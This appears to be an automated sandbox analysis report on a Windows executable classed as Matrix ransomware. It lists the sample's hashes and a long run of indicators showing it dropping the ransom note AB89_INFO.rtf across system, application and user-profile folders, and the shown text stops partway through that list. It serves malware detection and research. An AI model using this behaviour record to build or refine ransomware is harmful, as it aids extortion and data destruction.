Analysis
-
max time kernel
79s -
max time network
80s -
platform
windows7_x64 -
resource
win7 -
submitted
15-10-2020 17:16
Static task
static1
Behavioral task
behavioral1
Sample
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe
Resource
win7
Behavioral task
behavioral2
Sample
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe
Resource
win10
General
-
Target
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe
-
Size
6.5MB
-
MD5
1a699d18fc42426c1fdfe7ad01a42d20
-
SHA1
f8b0d7c0019f48ffb8f6d0f0634104751cc5842f
-
SHA256
095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270
-
SHA512
b6c0abad59318341f2ce0c9057df1d3dfe6421da36519b15927bbe769807ca007761bc47a64e69513ddb9d9cd02f8f2df6bce755a5c26adfadacd62da08ba253
Malware Config
Signatures
-
Matrix Ransomware 460 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Videos\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\startupCache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\MSBuild\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\security\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Pictures\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\Links for United States\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Music\Sample Music\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1131729243-447456001-3632642222-1000\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\AB89_INFO.rtf 